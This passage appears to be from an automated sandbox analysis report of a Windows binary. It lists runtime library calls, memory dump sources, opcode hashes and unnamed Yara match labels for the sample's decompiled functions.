                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02494FCA
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 02494FE1
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 02494FEA
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0249501B
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02495031
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0249504F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction ID: fa33ef56bb0c95eeb39764d851304065e66f7ef03ad4c32615aad209ff46229a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D211AC319002289BCF26EBA5D800BAE7FB6BF04314F64011FE416AB290DB749A068FD0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                          • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                          • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0249C401
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 0249C418
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 0249C421
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0249C452
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0249C468
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0249C486
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction ID: 768ddee3b84e9ddeaa3bf83ec9fb509deffc589887249256fa741be070419ae9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311E1719002289BCF15FBA5D884AEE7F76AF49714F10011FE411BB290DF748A05CFA0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02494E8C
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 02494EA3
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 02494EAC
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 02494EDD
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02494EF3
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02494F11
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction ID: d47f19abc1e49232ed04b5a5dcb823522a3c093a12b881c46147ccb0ac8bd282
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2411CE32D002299BCF15EBA5E800BEE7F76AF44314F24011FE411A7290DB749E06CF90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                                                          • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID: fJ@
• API String ID: 1836011271-3478227103
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
• FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 3657713681-923244539
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: H_prolog3_catchmake_shared
• String ID: MOC$RCC$v)D
• API String ID: 3472968176-3108830043
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
APIs
  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
• _free.LIBCMT ref: 00430B4F
• _free.LIBCMT ref: 00430B66
• _free.LIBCMT ref: 00430B85
• _free.LIBCMT ref: 00430BA0
• _free.LIBCMT ref: 00430BB7
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: _free$AllocateHeap
• String ID:
• API String ID: 3033488037-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                          • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                          • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                          • Instruction ID: 9183baee190f92fe4ff9971f9f8f290bd241a00a6d66dc2720c32f20ba4b289f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56518F79A00304EFDBA19F2ED841B6B77F5EF48724B24556EE809D7250E735E901CB80
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction ID: 2e2d82ee6c473176e2bad6a2ac5dec20f0beca9c1cdcd249725ddaaaf771b6d9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B41A33AA012049FCB54DF7DC980A9EB7F6EF85714B2545AED919EB381D731E901CB80
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                                                            • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 313313983-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                          • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                                                            • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                          • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                          • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 024AB152
                                                                                                                                                                                                                                                                            • Part of subcall function 024A1188: _SpinWait.LIBCONCRT ref: 024A11A0
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024AB166
                                                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024AB198
                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 024AB21B
